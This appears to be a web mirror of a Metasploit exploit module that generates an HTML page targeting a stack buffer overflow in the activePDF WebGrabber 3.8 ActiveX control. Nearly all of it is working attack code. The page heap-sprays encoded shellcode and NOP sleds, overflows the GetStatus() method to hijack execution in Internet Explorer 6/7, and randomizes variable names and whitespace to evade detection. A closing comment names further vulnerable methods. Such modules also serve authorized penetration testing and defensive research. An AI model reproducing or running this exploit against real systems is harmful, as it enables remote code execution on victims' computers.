Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/activepdf_webgrabber.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = LowRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'activePDF WebGrabber ActiveX Control Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When

18
          sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)

19
          an attacker may be able to execute arbitrary code. This control is not marked safe

20
          for scripting, so choose your attack vector accordingly.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [ 'MC' ],

24
        'References' => [

25
          [ 'OSVDB', '64579'],

26
          [ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],

27
        ],

28
        'DefaultOptions' => {

29
          'EXITFUNC' => 'process',

30
          'DisablePayloadHandler' => true

31
        },

32
        'Payload' => {

33
          'Space' => 1024,

34
          'BadChars' => "\x00",

35
        },

36
        'Platform' => 'win',

37
        'Targets' => [

38
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]

39
        ],

40
        'DisclosureDate' => '2008-08-26',

41
        'DefaultTarget' => 0,

42
        'Notes' => {

43
          'Reliability' => UNKNOWN_RELIABILITY,

44
          'Stability' => UNKNOWN_STABILITY,

45
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

46
        }

47
      )

48
    )

49


50
    register_options(

51
      [

52
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),

53
      ]

54
    )

55
  end

56


57
  def exploit

58
    # Encode the shellcode.

59
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

60


61
    # Create some nops.

62
    nops = Rex::Text.to_unescape(make_nops(4))

63


64
    # Set the return.

65
    ret = Rex::Text.uri_encode([target.ret].pack('L'))

66


67
    # Randomize the javascript variable names.

68
    vname = rand_text_alpha(rand(100) + 1)

69
    var_i = rand_text_alpha(rand(30) + 2)

70
    rand1 = rand_text_alpha(rand(100) + 1)

71
    rand2 = rand_text_alpha(rand(100) + 1)

72
    rand3 = rand_text_alpha(rand(100) + 1)

73
    rand4 = rand_text_alpha(rand(100) + 1)

74
    rand5 = rand_text_alpha(rand(100) + 1)

75
    rand6 = rand_text_alpha(rand(100) + 1)

76
    rand7 = rand_text_alpha(rand(100) + 1)

77
    rand8 = rand_text_alpha(rand(100) + 1)

78


79
    content = %Q|<html>

80
<head>

81
<script>

82
try {

83
  var #{vname} = new ActiveXObject('APWebGrabber.Object');

84
  var #{rand1} = unescape('#{shellcode}');

85
  var #{rand2} = unescape('#{nops}');

86
  var #{rand3} = 20;

87
  var #{rand4} = #{rand3} + #{rand1}.length;

88
  while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

89
  var #{rand5} = #{rand2}.substring(0,#{rand4});

90
  var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});

91
  while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};

92
  var #{rand7} = new Array();

93
  for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }

94
  var #{rand8} = "";

95
  for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }

96
  #{vname}.GetStatus(#{rand8},1);

97
} catch( e ) { window.location = 'about:blank' ; }

98
</script>

99
</head>

100
</html>

101
|

102


103
    content = Rex::Text.randomize_space(content)

104


105
    print_status("Creating '#{datastore['FILENAME']}' file ...")

106


107
    file_create(content)

108
  end

109
end

110


111
=begin

112


113
Other methods that are vulnerable.

114


115
[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]

116
void CleanUp(BSTR ServerIPAddress, long ServerPort);

117


118
[id(0x00000055)]

119
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);

120


121
...and probably more.

122
=end

123


124